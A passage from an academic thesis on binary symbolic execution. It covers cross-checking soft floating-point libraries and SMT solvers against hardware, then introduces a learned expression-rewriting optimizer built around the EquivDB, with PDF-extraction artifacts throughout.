Applying the tests to the JIT engine, which is never symbolically executed, and
comparing the registers with hardware execution revealed bugs on interesting edge
cases. For instance,√xon a negative single-precision value returns NaNin the JIT,
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 102
x86-64 Assembly Vex IR
cvtsi2ss %rbx , % xmm2 # i64 −>f32
movd % xmm2, %rcx # get f32t1 = 64to32 (And64 (G E T : I64 ( 216 ) ,0x3 : I64 ) ) #rounding
t2 = G E T : I64 ( 40 ) # get rbx
P U T( 288 ) = F64toF32 ( t1,I64StoF64 ( t 1 , t 2 ) ) #i64 −>f32
P U T( 24 ) = G E T : I64 ( 288 ) # f32 −>rcx
Figure 4.4: Mistranslation of the cvtsi2ss instruction in the VexIR
but - NaNfor hardware and softfloat . Errors in the JIT from translating machine
code (a known problem for machine code interpreters on integer workloads [60, 92]) to
LLVM bitcode appear across all libraries (e.g., f32 ←i64). Mismatches which appear
solely for the JIT could be due to instruction selection.
For an in-depth example, Figure 4.4 reproduces the code involved for a f32 ←i64
conversion error. The operation program begins as x86-64 machine code which is
translated by the VEX decoder into VEX IR, then from VEX IR into LLVM bitcode;
if VEX mistranslates the machine code, the symbolic interpretation will be wrong. In
the case of f32←i64, the x86-64 instruction cvtsi2ss converts a 64-bit signed integer
to a single precision floating-point number. The corresponding VEX IR converts the
signed integer into a double precision number, then to single precision. This induces
rounding errors (confirmed by the VEX maintainer) that cause certain inputs (e.g.,
rbx = 72057598332895233) to evaluate one way natively (7.20576e+16) and another
way through VEX (7.2057594e+16).
4.4.4 Common Pitfalls
Some effort was put into improving the library code’s cross-checking results before
finalizing the data. The softfloat and linmips libraries were intended to be con-
sistent whereas the consistency of bsdhppa and bsdppc was a lower priority. Most
improvements concentrated on a few frequent problems.
Endianness . Architecture byte-order can conflict with the hardware byte-order.
The PA-RISC ( bsdhppa ), PowerPC ( bsdppc ), and MIPS ( linmips ) architectures
are big-endian but the host x86-64 machine is little-endian. MIPS is dual-endian so
linmips has a #define to enable little-endian mode. For bsdhppa , the glue code must
swap double-precision operands and results. bsdppc , evolved from SPARC and m68k
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 103
code bases, is staunchly big-endian. For instance, a 32-bit function for converting
double precision values expects the most significant half of a 64-bit value as its 32-bit
return result, a big-endian convention.
Default NaN. Certain operations, such as division by zero, produce a default
“quiet” NaN. Unfortunately, hardware is free to deterministically choose a QNaN from
223bit-patterns. Both single and double precision QNaN s differed from the host ma-
chine for every library. The single-precision QNaN was 0x7fffffff , as opposed to
x86-64 hardware which uses 0xffc00000 . Manual inspection of the Linux x87 emu-
lator confirmed the values on x86-64 matched the expected QNaN .
NaNoperands . The x86-64 floating-point unit encodes extra diagnostic informa-
tion into the mantissa of its NaNs which disagrees with emulation. There are numerous
ways to mishandle a NaNoperation so the bits do not match. For operations between
NaNs, a signaling NaNwould sometimes be converted into the wrong QNaN . Arithmetic
between a NaNand number would use the default NaN, missing the mantissa bits.
Likewise, operands returning the left-hand NaNin hardware instead used the library
default NaN. Although this extra information is optional, it is still desirable to stay
bit-identical to the host hardware.
4.4.5 Coverage
Operation test cases raise plenty of mismatches but the depth of testing remains
unclear. Code coverage for each library is a simple metric for overall testing quality;
high coverage implies thorough testing. Figure 4.5 shows the coverage of each floating-
point implementation from symbolic execution. The instruction coverage percentages
are calculated from visited functions. The set of instructions is limited to visited
functions because soft floating-point libraries often have additional features which
are inaccessible through the interpreter (e.g., trapped instruction decoding). Total
covered instructions gauges the complexity, although not necessarily the correctness,
of the library implementation.
Between 79%–95% of instructions were covered by test cases for each library,
which leaves 5%–21% of instructions uncovered. There are several justifiable reasons
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 104
 0 20 40 60 80 100
bsdhppa
bsdppclinmips
softfloatsoftgun 2000 2500 3000 3500 4000 4500 5000 5500% Coverage 
Covered InstructionsCoverage of Visited Functions
Coverage % Instructions
Figure 4.5: Soft floating-point library code coverage and total covered instructions
for missing instructions. All libraries support all rounding modes but only round-
nearest is tested because it is the default mode. Compiler optimizations mask paths;
when converting xto floating-point, one optimization tests if xis 0 using an integer
comparison to avoid the floating-point instruction, leaving the 0 library path unex-
plored. Finally, compiled-in assertions, such as checking for bad type tags, often
remain uncovered because the code never contradicts the assertion predicate.
4.5 Floating-Point SMT Solvers
This section evaluates the accuracy of floating-point solvers with respect to floating-
point hardware. A floating-point solver decides the satisfiability of formulas over a
theory of floating-point and therefore must at least encode floating-point semantics
like those found in soft floating-point libraries. Prior work [114] suggests testing
floating-point solvers with randomly generated conformance formulas. Unlike ran-
domized conformance queries, test cases derived from soft floating-point target inter-
esting edge cases defined by the emulation code. Despite the importance of accuracy,
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 105
testing a selection of solvers reveals divergent results in every solver. Furthermore,
each floating-point solver has implementation quirks which impede testing with all
operations and values.
Several freely available contemporary floating-point solvers support a theory of
IEEE-754 floating-point. These solvers include mathsat5-2.8 [64], sonolar-2013-05-
15 [106], and Z3 [49] (current stable and unstable FPA versions from the git reposi-
tory). Such specialized floating-point solvers back the only complete symbolic execu-
tion alternative to soft floating-point. However, these solvers only occasionally con-
form to a standard interface, have complicated internals and, despite formal proofs
of correctness, are clearly wrong when compared to hardware in many cases.
SMTLIB2-FPA [115] (a proposed standard) conformance tests [114] provide a
useful baseline test suite for SMTLIB2-FPA compliant solvers (mathsat and Z3). The
conformance tests cover a range of features in SMTLIB2-FPA. These tests exercise the
front-end and floating-point theory for a floating-point solver. A solver implements
SMTLIB2-FPA in its front-end by translating floating-point arithmetic (FPA) theory
primitives into an internal floating-point representation. The tests were generated
from the reference implementation with random floating point numbers for a total of
20320 SMTLIB2-FPA queries.
The automatically generated test cases from soft floating-point libraries are novel
in that they work as semantically derived tests for third-party floating-point solvers.
Each test includes an operation and operands (e.g., (+ a b)) and a scalar result r
computed through hardware. Each solver is tested against the hardware result by
checking that the operation feasibly evaluates to rwith a bit-vector equality query
as in Figure 4.6. The library tests are based on the smaller fork-inhibited data set
from Section 4.4.3 to reduce testing overhead. These tests are simple satisfiability
tests on concrete expressions; they neither impose symbolic constraints on operands
nor examine counter-examples.
Table 4.6 lists the test results for the floating-point solvers. Even though the
tests are shallow, every solver fails some test (fail), indicating actual bugs, or gives
no answer after five minutes or refusing certain inputs (unknown). Each row only
has a subset of the tests because the front-end and library interfaces lack particular
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 106
(set−logic QFFPA)
(set−info : s t a t u s sat )
(assert (= (/ roundNearestTiesToEven
; a = 4.96875
( (asFloat 8 24) ( bv0 1) ( bv2031616 23) ( bv129 8))
; b = 1.9469125 e −38
( (asFloat 8 24) ( bv0 1) ( bv5505024 23) ( bv1 8 ) ) )
; r = 2.5521178 e+38
( (asFloat 8 24) ( bv0 1) ( bv4194304 23) ( bv254 8 ) ) ) )
(check−sat)
; a / b = 2.5521178 e+38 i s sat , but model claims a/b=p l u s I n f i n i t y
Figure 4.6: A Z3 test case query for checking a single-precision division result
Solver Conformance Library Tests
Pass Fail Pass Fail Unknown
mathsat 14487 5833 10096 0 2455
sonolar 10699 482 0
z3-stable 20023 297 7081 2931 1076
z3-fpa 20090 230 9996 16 1076
Table 4.6: Conformance and library test cases applied to several FPA solvers
operations (e.g.,̸=). Overall, the rate of failure indicates these solvers are currently
more appropriate for domain-specific applications than general program testing.
Each solver has its own quirks. mathsat’s front-end accepts the latest SMTLIB2-
FPA proposal but misses a rounding mode in the conformance tests. For concrete
tests mathsat is consistent but rejects NaNinputs and often times out on division
operations. Sonolar only supports floating-point with library bindings. The Z3 solver
accepts obsolete SMTLIB2-FPA and lacks some type conversions. Furthermore, the
stable branch of Z3 is nearly a year old; the current unstable Z3 FPA branch is a
significant improvement but still diverges from hardware.
4.6 Bugs in Linux programs
The previous sections focus on custom testing with soft floating-point; in this sec-
tion, the symbolic executor is applied to a large general program set. Test cases were
collected from five minutes of symbolic execution on 27795 program binaries from
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 107
Bug Type Programs
Divide By Zero 26
Bad Write 57
Bad Read 259
Total Programs 314
Table 4.7: Bugs found in Linux programs following floating-point computation
Ubuntu 13.10 (x86-64) and Fedora 19 (x86) using the SoftFloat library. Floating-
point arithmetic appears in hundreds of program faults from these test cases. How-
ever, the influence of floating-point operations can be subtle and independent of the
crash. Additionally, few paths use the symbolic floating-point capabilities but the
overhead from concrete evaluation with soft floating-point is often negligible com-
pared to concrete evaluation using the host’s floating-point instructions.
Table 4.7 presents a summary of flagged floating-point programs. Although 4979
binaries raise some kind of error, only paths covering floating-point instructions on
replay (837 test cases) are considered to isolate floating-point tests. Test cases are
classified as errors by the type of program fault they cause. The errors are validated
with a replay mechanism based on the JIT (568 test cases); fault-free test cases in
the JIT replay are ignored. The largest class, bad memory reads, frequently accessed
lower addresses which presumably stem from NULL pointers.
Floating-point is often independent of the actual bug; programs such as gifrsize ,
scs2ps , and pngcrush all access NULL pointers solely through integer constraints.
Regardless, floating-point numbers may subtly influence symbolic integers. The
unicoverage program (crashes on a buffer overflow) lends an example expression:
100.0*nglyphs/(1+cend-cstart) . Terms cend and cstart are symbolic integers
(read from scanf ) and nglyphs is a concrete integer. The floating-point 100 .0 term
coerces the symbolic integer expression into a double precision floating-point value.
The floating-point multiplication therefore imposes floating-point constraints (from
the i32→f64 operation) on integer-only terms. Curiously, manual inspection of many
reports yielded no direct floating-point crashes (e.g., a dereference with a floating-
point derived index [57]) but this may be a symptom of briefly symbolic execution
time per program.
CHAPTER 4. OFF-THE-SHELF SYMBOLIC FLOATING-POINT 108
The majority of floating-point test cases rely solely on concrete floating-point data.
Only 94 programs (18%) forked on soft floating-point library code and hence processed
any symbolic floating-point values at all. Programs which process only concrete
floating-point data incur overhead from dispatching extra instructions for floating-
point emulation. The instruction overhead from emulating concrete floating-point
with integer code, compared to the default klee concrete floating-point dispatch,
is negligible. Soft floating-point tests incur 242058 extra instructions on average
(1.04×overhead) with a 135474 instruction standard deviation (1 .61×overhead) and
613 instruction median (1 .0007×overhead). Floating-point heavy programs skew
the average: a program for processing triangulated meshes, admesh , suffered the
maximum instruction overhead of 6 .98×, followed by bristol , an audio synthesizer
emulator, with 2 .68×overhead.
4.7 Conclusion
The best software analysis tools must soundly model floating-point. Floating-point
as a runtime library is perhaps the simplest worthwhile way to model high-quality
floating-point semantics in a symbolic binary executor. This quality comes from soft
floating-point being testable within reason through a combination of symbolic execu-
tion and cross-checking against hardware. Integer-only symbolic execution produces
concrete test files with floating-point information which can be directly confirmed
by hardware. If important tests are missed from underspecification, they may be
found by testing with multiple floating-point libraries. Finally, although the library
testing is incomplete in some cases, the results have demonstrated that a symbolic
soft floating-point unit is sufficient for finding many verifiable test cases for bugs in
commodity binary programs.
Chapter 5
Expression Optimization from
Program Paths
5.1 Introduction
Shifting from specialized symbolic interpretation to general binary translation im-
poses a performance challenge. First, compilers target physical machine microarchi-
tectures. Fast code on hardware may be slow to interpret due to expensive constraint
solver queries. Next, resource mismatches from translation incur some overhead. For
instance, register access may map to an intermediate value access plus a read into
memory emulating a register file. Furthermore, type information, control structures,
and other metadata from source code, which is useful for inferring execution traits,
is often unavailable at the binary level. Finally, simple ad-hoc tuning fails to scale to
the variety of programs, compilers, and optimization configurations in the wild.
In practice, solver requests dominate symbolic execution running time. Figure 5.1
illustrates query overhead; of several hundred programs after running five minutes,
80% spend more time solving for satisfiability than dispatching instructions. Hence,
reducing or eliminating queries can be expected to yield gains.
There is ample opportunity to optimize queries. Based on Figure 5.2, the total
number of external calls made to the solver for the same programs from Figure 5.1,
a typical symbolic execution session may submit thousands of queries to the solver.
109
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 110
 0 10 20 30 40 50 60 70 80 90 100
 0 200  400  600  800  1000  1200  1400  1600% Query Time
Sorted Program% Time Spent in Solver
Figure 5.1: Percent time for queries
 0 5000 10000 15000 20000 25000
 0 200  400  600  800  1000  1200  1400  1600Deep Solver Calls
Sorted ProgramDeep Solver Calls Made By Programs Figure 5.2: Total external solver calls
These solver calls primarily determine branch satisfiability for symbolic conditionals
(e.g., whether a state should fork) and are inherent to symbolic execution.
The expressions which define queries often have redundancies or unnecessarily
verbose terms suitable for optimizations. As an example, a loop that increments an ex-
pressionxevery iteration might produce the bulky expression (+ ...(+ (+x1) 1)...1)
which should fold into a svelte (+ x c). Binary code worsens the problem because
translation artifacts leads to more operations and hence larger expressions.
We present an expression optimizer which learns reduction rules across symbolic
evaluation of large program sets. During the learning phase, expressions produced at
run time are keyed by a hash of samples and stored to a global database. Candidate
rules are constructed by matching the sample hash against the hashes of shorter
expressions in the database. Each candidate rule is verified using the theorem prover,
applied in the interpreter, and saved for future use. Rules are further processed into
generalized rules suitable for matching larger classes of expressions.
We implement and evaluate the expression optimizer in klee-mc . Although this
system uses binary symbolic execution, the optimizer will work for a traditional
source-based symbolic execution system provided such a system scales to support
large and diverse programs sets. The optimizer is evaluated at scale with over two
thousand commodity programs from a stock desktop Linux system. Rules collected
from the programs during a brief learning period are shown to lessen the total num-
ber of queries dispatched during symbolic execution by 18% on average and improve
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 111
⟨expr⟩::=⟨bit-vec-num⟩
|(⟨unary-op⟩⟨expr⟩)
|(⟨binary-op⟩⟨expr⟩⟨expr⟩)
|(⟨extend-op⟩⟨expr⟩⟨num⟩)
|(Select⟨expr⟩⟨expr⟩⟨expr⟩)
|(Extract⟨num⟩⟨num⟩⟨expr⟩)
|(Read⟨array⟩⟨expr⟩)
| ⟨bit-vec-num⟩
⟨num⟩::= [0-9]+
⟨bit-vec-num⟩::⟨num⟩w⟨num⟩
⟨array⟩::= [a-z][a-z0-9]* |(Store⟨array⟩⟨expr⟩⟨expr⟩)
⟨unary-op⟩::= Not|Neg|NotOptimized
⟨binary-op⟩::=⟨arith-op⟩|⟨bit-op⟩|⟨compare-op⟩|Concat
⟨arith-op⟩::= Add|Sub|Mul|UDiv|SDiv|URem|SRem
⟨bit-op⟩::= Shl|LShr|AShr|Or|And|Xor
⟨extend-op⟩::= ZExt|SExt
⟨compare-op⟩::= Eq|Ne|Ult|Ule|Ugt|Uge|Slt|Sle|Sgt|Sge
Figure 5.3: klee Expression Language Grammar
running and solver times by 10% on average.
5.2 Symbolic Execution and Expressions
Recall symbolic expressions are a byproduct of symbolic execution. The symbolic
executor runs a program by marking inputs as symbolic and evaluating the program’s
instructions. This evaluation emits expressions to represent operations on symbolic
data.
The symbolic executor manipulates a mix of concrete values and symbolic expres-
sion data when evaluating LLVM operations. LLVM operations are those defined
by the LLVM IR, such as arithmetic, logical, and memory operations, as well as a
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 112
handful of specialized LLVM intrinsics. klee maps the results of these operations to
expressions with the grammar in Figure 5.3; this language is isomorphic to a subset
of the SMTLIB [11] language used by the constraint solver. When convenient, oper-
ators will be written in shorthand notation. For instance, the expression to add two
bit-vector expressions aandbis (+ab).
Large, redundant expressions are expensive. A large expression slows query serial-
ization to the solver and is costly to evaluate into a constant on variable assignment.
Expanded tautologies (e.g., ( x∨¬x)), or expressions that evaluate to one value for
all interpretations, pollute solver caches and incur unnecessary calls to the theorem
prover. Worse, a large expression may linger as a path constraint, slowing future
queries that must use the constraint set.
There are common two strategies for shedding expression bloat: expression op-
timization and concretization. Expression optimization applies sound identities to
reduce an expression to fewer terms. For instance, the bit-wise orexpression ( or0x)
is identical to x. The drawback is that vital identities are program-dependent; it is
infeasible to encode all useful reductions by hand. Alternatively, concretizing sym-
bolic terms reduces expressions to constants at the cost of completeness; xbecomes
{c}instead ofx⊂N.
The original klee interpreter uses both expression optimization and concretiza-
tion. A hand-written optimizer folds constants and reduces excess terms from dozens
of common redundancies. For concretization, path constraints are inspected through
implied value concretization (IVC) to find and concretize variables which are constant
for all valid interpretations. For instance, under IVC the constraint (= x1) replaces
xwith 1 in the program state.
We consider the problem of expression node minimization. Given an expression e,
we wish to find a semantically equivalent expression e′with the fewest possible terms.
Formally, we define expression node minimization as follows: given an expression e
the minimized expression e′is such that for all tautological expressions (= e ei),
the number of nodes in e′,|e′|, satisfies|e′| ≤ |ei|. It is worth noting e′is not
unique under this definition. To ensure e′is unique, first define an ordering operator
on expressions≤whereei≤ejwhen there are fewer nodes, |ei|<|ej|, or by lexical
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 113
comparison,|ei|=|ej|∧lex(ei)≤lex(ej). Uniqueness is then given by the expression
minimization problem on ewhen finding e′wheree′≤eifor allei.
A node minimizing optimizer has several advantages over non-minimizing opti-
mization. Theoretically, it is bounded when greedy; optimization stops once the
expression stops shrinking. If a conditional expression reduces to a constant, a solver
call may be avoided. Contingent conditionals also benefit, such as through better
independence analysis since fewer terms must be analyzed. Furthermore, smaller
expressions improve the likelihood that IVC will discover concretizing implications
because the expressions are simpler. On the other hand, smaller expressions may
lead to slower queries because some operations (e.g., integer division) are slow; how-
ever, we observe performance improvements from our implementation in Section 5.7.
5.3 Rules from Programs
Expression minimization forms a reduction relation ,→. Reductions are central to
the theory of contractions, a classic formalization for converting lambda calculus
terms [36]. This theory was further developed in abstract rewriting systems as re-
duction relations under the notion of confluence [70]. We use reduction relations as
a framework for reasoning about properties of the expression rewriting system.
The problem of discovering elements of →is handled with a database of reduction
rule targets (“reducts”). The database, referred to as the EquivDB, is globally pop-
ulated by expressions made during symbolic execution of binary programs. As the
executor creates expressions, they are matched against the EquivDB with assistance
from a theorem prover to find smaller, but semantically equivalent, expressions. If
equivalent, the expression reduces to the smaller expression and is related under →.
Information about →is maintained as a set of rewrite rules. Each rule has a from-
pattern and a to-pattern which describe classes of elements in →through expression
templates. Once shown to be sound by the theorem prover, rules are used as the
expression optimization directive format in the symbolic interpreter.
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 114
5.3.1 Reductions on Expressions
A reduction from one expression to another is cast in terms of reduction relations. A
reduction relation describes sound translation of λ-terms to other λ-terms. We omit
the trivial proof of the existence of the correspondence from expressions to λ-terms,
ΛE: Expr→Λ, but note all expressions for our purposes are in the set of closed
sentences Λ0. All variables are bound; arguments to Λ E(e) are De Bruijn indexes of
8-bit symbolic array read operations ( select in SMTLIB) from e.
The reduction relation →is defined as the binary relation
→={(ΛE(e),ΛE(e′))|(e,e′)∈Expr2, e′≤e∧(=e′e)}
The optimal reduction relation ↠, the subset of→containing only optimally
minimizing reductions, is defined as
↠={(e, e′)∈→ |∀ (e,e′′)∈→.Λ−1
E(e′)≤Λ−1
E(e′′)}
An expression is reduced by →throughβ-reduction. The reduction a→bis said
to reduce the expression ewhen there exists an index assignment σfor ΛE(e) where
ΛE(e)σis syntactically equal to a.β-reducingbwith the terms in esubstituted by
σon matching variable indices yields the shorter expression [ a→b][e]. The new
[a→b][e] is guaranteed by referential transparency to be semantically equivalent to
eand can safely substitute occurrences of e.
As an example of a reduction in action, consider the following 8-bit SMTLIB
expressions eande′that were observed in practice. Both expressions return the
value 127 when the contents of the first element in a symbolic array is zero or the
value 0 otherwise:
e= (bvand bv 128[8] ( sign extend [7] (= bv0[8] ( select abv0[32]))))
e′= (concat (=bv0[8] ( select bbv0[32])) bv0[7])
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 115
Expressions eande′are semantically equivalent following α-conversion to the vari-
ables. Applying Λ Eyields the De Bruijn notation λ-terms,
ΛE(e) = (λx1.(and128 ( sgnext7 (= 0x1))))
ΛE(e′) = (λx1.(concat (= 0x1) 07))
Any expression syntactically equivalent to eup to the variable select term is
reducible by Λ E(e)→ΛE(e′). For instance, suppose the variable term were replaced
with (∗3 (selectc1)). Applying the reduction rule with a β-reduction replaces the
variable with the new term,
ΛE(e′)(∗3 (selectc1))→β(concat (= 0 (∗3 (selectc1))) 0 7)
Finally, the new λ-term becomes an expression for symbolic interpretation,
(concat (=bv0[8] ( bvmul bv 3[8] ( selectcbv1[32])) bv0[7])
.
5.3.2 EquivDB
Figure 5.4: Storing and checking an expression against the EquivDB
Elements of→are discovered by observing expressions made during symbolic
execution. Each expression is stored to a file in a directory tree, the EquivDB, to
facilitate a fast semantic lookup of expression history across programs. The stored
expressions are shorter candidate reducts . The expression and reduct are checked for
semantic equivalence, then saved as a legal reduction rule.
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 116
Generating Candidate Reducts
The expressions generated by programs are clues for reduction candidates. The in-
tuition is several programs may share local behavior once a constant specialization
triggers a compiler optimization. Following a path in symbolic execution reintroduces
specializations on general code; terms in expressions are either implicitly concretized
by path constraints or masked by the particular operation sequence from the path.
These (larger) expressions from paths then eventually match (shorter) expressions
generated by shorter instruction sequences.
In the rule learning phase, candidate reducts are collected by the interpreter’s
expression builder and submitted to the EquivDB. Only top-level expressions are
considered to avoid excess overhead from intermediate expressions which are gener-
ated by optimization rewrites during construction. To store an expression into the
EquivDB, it is sampled, the values are hashed, and is written to the file path <bit-
width>/<number of nodes >/<sample hash >. Reduct entries are capped at 64 nodes
maximum to avoid excessive space utilization; Section 5.3.3 addresses how reducts can
exceed this limit to reduce large expressions through pattern matching.
Samples from expressions are computed by assigning constant values to all array
select accesses. The set of array assignments include all 8-bit values (e.g., for 1, all
symbolic bytes are set to 1), non-zero values strided by up to 17 bytes (i.e., >2×
the 64-bit architecture word width to reduce aliasing), and zero strings strided by up
to 17 bytes. The expression is evaluated for each array assignment and the sequence
of samples is combined with a fast hashing algorithm [2]. It is worth noting this
has poor collision properties; for instance, the 32-bit comparisons (= x12345678)
and (=x12345679) would have the same sample hashes because neither constant
appears in the assignment set. Presumably, more samples would improve hash hit
rates at the expense of additional computation.
The EquivDB storage and lookup facility is illustrated by Figure 5.4. At the top of
the diagram, an expression from the interpreter is sampled with a set of assignments
and the values are hashed. The expression is looked up by the sample hash in the
EquivDB and saved for future reference. The match from the look up is checked
against the starting expression for semantic equality. Finally, the equality is found
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 117
:extrafuns ((x Array[32:8]))
:formula
(= (ite (= bv0xffffffff00[40] (extract[63:24]
(bvadd bv0xffffffff00000001[64]
(zero extend[56] (select x bv0[32])))))
bv1[1] bv0[1]) bv0[1])
Figure 5.5: An example translation verification query
valid and the corresponding rule is stored into the rule set.
Reduction by Candidates
Before storing an expression eto the EquivDB, the learning phase attempts to con-
struct a reduction rule. Based on e’s sample hash, the EquivDB is scanned for
matching hashes with the same bit-width and fewer terms. Expression equivalence is
checked using the theorem prover and, if valid and contracting, a rule is saved and
applied to the running program.
The learning phase loads a smaller expression from the EquivDB based on match-
ing sample hash and bit-width. Loading a candidate reduct e∗parses an SMT file
from the EquivDB into an expression with temporary arrays for each symbolic read.
The temporary arrays in e∗are replaced by index in Λ E(e∗) with the matching index
terms from Λ E(e) to gete′. If the reduct is contracting, e′<e, and (=ee′) is valid
by the solver, then ( e,e′)∈→ ande→e′is saved as a rule for future reference. If
e→e′is valid, the shorter e′is produced instead of e.
An example query for a candidate rule validity check is given in Figure 5.5. An
equality query on an arithmetic expression ( e) and a constant ( e′) is sent to the
solver and a “sat” or “unsat” string is returned; the from-expression extract (...)
is compared against the to-expression 0xffffffff00 40. To determine soundness of
the rulee→e′with one query, the equality is negated so validity follows from
unsatisfiability. Negation of the example translation equality is unsatisfiable, hence
the translation is valid.
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 118
Care is taken to handle several edge cases. Expressions eoften reduce to a con-
stant, but storing and accessing constant values from the EquivDB is needless over-
head. Instead, the sample hash predicts eis constant by observing unchanging sample
valuesc; the constant cserves as a candidate reduct e↠cbefore falling back to the
EquivDB. Whenever the solver code builds an expression, to avoid infinite recursion
from equivalence checks, that expression is queued for rule checking until the inter-
preter dispatches the next program instruction. For reliability, if the solver fails or
takes too long to check a rule’s validity, then the rule is dropped and eis returned
for symbolic interpretation.
5.3.3 Rewrite Rules
Rewrite rules represent sets of reductions in →. Every rewrite rule traces back to
a sound primordial expression equality originating from the EquivDB. Each rewrite
rule covers a class of reductions with expression template patterns that match and
materialize classes of expressions. These rules direct expression optimization and are
managed as a rule set kept on persistent storage.
Every candidate rule built during the learning phase is verified with the solver.
The equivalent expressions e, from the interpreter, and e′, from the EquivDB, are
converted into a from-pattern aand to-pattern bwhich are combined to make a rule
a→b. Oncea→bis verified, all future applications of the rule a→bare conducted
without invoking the solver.
A rule pattern is a flattened expression with extra support for replacement slots.
Figure 5.6 lists the grammar for patterns and rules in general. Symbolic array reads
are labeled as 8-bit slots ( ⟨label⟩) which correspond to the variables from the ex-
pression transform Λ E. These slots are used in pattern matching which is described
in Section 5.4 and establish variable correspondence between the from-pattern and
to-pattern. Dummy variables ( ⟨dummy-var⟩), which are only matched on expression
width and ignore structure, replace useless subexpressions through subtree elimi-
nation (Section 5.6.1). Likewise, there are constrained slots ( ⟨cconst⟩) for constants,
introduced through constant relaxation (Section 5.6.2), which match when a constant
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 119
⟨rule⟩::=⟨from-pattern⟩→⟨ to-pattern⟩⟨const-constraints⟩
⟨from-pattern⟩::=⟨const⟩
| ⟨unary-op⟩⟨from-pattern⟩
| ⟨binary-op⟩⟨from-pattern⟩⟨from-pattern⟩
| ⟨extend-op⟩⟨from-pattern⟩⟨const⟩
|Select⟨from-pattern⟩⟨from-pattern⟩⟨from-pattern⟩
|Extract⟨const⟩⟨const⟩⟨from-pattern⟩
| ⟨label⟩|⟨cconst⟩|⟨dummy-var⟩
⟨to-pattern⟩::=⟨const⟩
| ⟨unary-op⟩⟨to-pattern⟩
| ⟨binary-op⟩⟨to-pattern⟩⟨to-pattern⟩
| ⟨extend-op⟩⟨to-pattern⟩⟨const⟩
|Select⟨to-pattern⟩⟨to-pattern⟩⟨to-pattern⟩
|Extract⟨const⟩⟨const⟩⟨to-pattern⟩
| ⟨label⟩|⟨cconst⟩
⟨const-constraints⟩::=⟨constraint-expr⟩⟨const-constraints⟩|ε
⟨constraint-expr⟩::=⟨const⟩
| ⟨unary-op⟩⟨constraint-expr⟩
| ⟨binary-op⟩⟨constraint-expr⟩⟨constraint-expr⟩
| ⟨extend-op⟩⟨constraint-expr⟩⟨const⟩
|Select⟨constraint-expr⟩⟨constraint-expr⟩⟨constraint-expr⟩
|Extract⟨const⟩⟨const⟩⟨constraint-expr⟩
| ⟨cconst⟩
⟨const⟩::= Constant⟨bit-vec-num⟩
⟨label⟩::= l⟨num⟩
⟨dummy-var⟩::= v⟨num⟩
⟨cconst⟩::= c⟨num⟩
Figure 5.6: Expression reduction rule grammar
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 120
satisfies constraints bundled with the rule ( ⟨const-constraints⟩).
Rules are written to persistent storage in a binary format, serialized into files, and
read in by the interpreter. Serialization flattens expressions into patterns by a pre-
order traversal of all nodes. On storage, each rule has a header which lets the rule
loader gracefully recover from corrupted rules, specify version features, and ignore
deactivated tombstone rules.
Manipulating rules, such as for generalization or other analysis, often requires
materialization of patterns. A pattern, which represents a class of expressions, is ma-
terialized by building an expression belonging to the class. Rules can be materialized
into a validity check or by individual pattern into expressions. The validity check
is a query which may be sent to the solver to verify that the relation a→bholds.
Each materialized expression uses independent temporary arrays for symbolic data
to avoid assuming properties from state constraint sets.
5.4 Rule-Directed Optimizer
The optimizer applies rules to a target expression to produce smaller, equivalent
expressions. A rule-directed expression builder loads a set of reduction rules from
persistent storage at interpreter initialization. The expression builder applies reduc-
tion rules in two phases. First, efficient pattern matching searches the rule set for a
rule with a from-pattern that matches the target expression. If there is such a rule,
the target expression β-reduces on the rule’s to-pattern to make a smaller expression
which is equivalent to the target.
5.4.1 Pattern Matching
Over the length of a program path, a collection of rules is applied to every observed
expression. The optimizer analyzes every expression seen by the interpreter, so finding
a rule must be fast and never call out to the solver. Furthermore, thousands of rules
may be active at any time, so matching rules must be efficient.
The optimizer has three ways to find a rule rwhich reduces an expression e. The
CHAPTER 5. EXPRESSION OPTIMIZATION FROM PROGRAM PATHS 121
simplest, linear scan, matches eagainst one rule at a time until reaching r. The next
method hashes eignoring constants and select s (skeletal hashing) then matches
somerwith the same hash for its from-expression. Flexible matching on the entire
rule set, which includes subexpression replacement, is handled with a backtracking
trie traversed in step with e. Both skeletal hashing and the trie are used by default
to mitigate unintended rule shadowing.
Linear Scan. The expression and from-pattern are scanned and pre-order tra-
versed with lexical tokens checked for equality. Every pattern variable token assigns
its label to the current subexpression and skips its children. If a label has already
been assigned, the present subexpression is checked for syntactic equivalence to the
labeled subexpression. If distinct, the variable assignment is inconsistent and the rule
is rejected. All rules must match through linear scan; it is always applied after rule
lookup to double-check the result.
Skeletal hashing. Expressions and from-patterns are skeletal hashed [46] by ig-
noring select s and constants. A rule is chosen from the set by the target expression’s
skeletal hash. The hash is invariant with respect to array indexes and is imprecise; a
hash matched rule will not necessarily reduce the expression. Lookup is kept sound
by checking a potential match by linear scanning.
Backtracking Trie. A trie stores the tokenization of every from-pattern. The
target expression is scanned with the trie matching the traversal. As nodes are
matched to pattern tokens, subexpressions are collected to label the symbolic read
slots. Choices between labeling or following subexpressions are tracked with a stack
for backtracking on match failure. On average, an expression is scanned about 1.1
times per lookup, so the cost of backtracking is negligible.
Many expressions never match a rule because they are already optimal or there
is no known optimization. Since few unique expressions match on the rule set rel-
ative to all expressions built by at runtime, rejected expressions are fast-pathed to
avoid unnecessary lookups. Constants are the most common type expression and are
obviously optimal; they are ignored by the optimizer. Misses are memoized; each
non-constant expression is hashed and only processed if no expression with that hash
failed to match a rule.
